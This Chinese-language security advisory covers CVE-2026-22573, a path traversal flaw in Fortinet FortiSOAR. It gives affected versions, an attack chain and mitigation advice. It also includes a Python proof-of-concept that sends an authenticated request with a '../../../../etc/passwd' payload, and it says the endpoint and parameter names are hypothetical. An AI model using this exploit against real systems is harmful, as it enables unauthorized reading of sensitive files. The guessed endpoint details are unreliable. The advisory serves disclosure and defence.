IPBUF安全漏洞报告
English
CVE-2026-22573 CVSS 6.5 中危

CVE-2026-22573 Fortinet FortiSOAR路径遍历漏洞

披露日期: 2026-04-14

漏洞信息

漏洞编号
CVE-2026-22573
漏洞类型
路径遍历
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Fortinet FortiSOAR

相关标签

路径遍历FortinetFortiSOAR信息泄露CWE-22

漏洞概述

Fortinet FortiSOAR PaaS及本地部署版本中存在路径遍历漏洞。由于系统未能正确限制路径名至受限制的目录,经过身份认证的远程攻击者可利用“文件内容提取”操作执行路径遍历攻击。受影响版本涵盖7.3至7.6多个版本,攻击者成功利用后可读取敏感文件,导致高机密性风险。

技术细节

该漏洞属于路径遍历漏洞,核心成因在于Fortinet FortiSOAR在处理文件内容提取操作时,未能有效限制用户输入的路径名。应用程序未对文件路径参数进行严格的边界检查或规范化处理,导致攻击者可以通过插入路径遍历序列(如“../”)或绝对路径,绕过预定的受限目录。从攻击角度来看,攻击者首先需要具备有效的低权限账户。一旦认证通过,攻击者可向受影响接口发送特制的数据包,操纵文件读取逻辑指向系统敏感区域(如/etc/passwd或配置文件)。由于CVSS向量显示机密性影响为高(C:H),该漏洞主要导致信息泄露,而不会直接影响数据的完整性或系统的可用性。

攻击链分析

STEP 1
侦察
识别目标为Fortinet FortiSOAR系统,并确认其版本在受影响范围内(7.3至7.6)。
STEP 2
认证
利用获取的低权限账户凭证登录系统,满足漏洞利用的先决条件(PR:L)。
STEP 3
漏洞利用
向“文件内容提取”接口发送特制的HTTP请求,在文件路径参数中注入“../”序列以遍历目录。
STEP 4
数据渗出
服务器响应返回目标文件(如/etc/passwd)的内容,攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the vulnerable endpoint (Hypothetical based on description) target_url = "https://<target-ip>/api/file_content_extraction" # Attacker credentials (Low privilege required) auth = ("low_priv_user", "password") # Payload attempting to read /etc/passwd using path traversal # The parameter name 'file_path' is an example based on "File Content Extraction actions" payload = { "file_path": "../../../../etc/passwd", "action": "extract" } try: # Send POST request with authentication response = requests.post(target_url, auth=auth, json=payload, verify=False) # Check if the attack was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! File content retrieved:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print("Status code:", response.status_code) print("Response:", response.text[:200]) # Print partial response to avoid clutter except Exception as e: print(f"Error: {e}")

影响范围

FortiSOAR PaaS 7.6.0 - 7.6.3
FortiSOAR PaaS 7.5.x
FortiSOAR PaaS 7.4.x
FortiSOAR PaaS 7.3.x
FortiSOAR on-premise 7.6.0 - 7.6.3
FortiSOAR on-premise 7.5.x
FortiSOAR on-premise 7.4.x
FortiSOAR on-premise 7.3.x

防御指南

临时缓解措施
在未应用补丁前,建议管理员暂时禁用文件内容提取功能,或通过防火墙规则严格限制仅受信任的IP地址可访问该接口。同时,加强对系统日志的审计,及时发现异常的文件访问行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表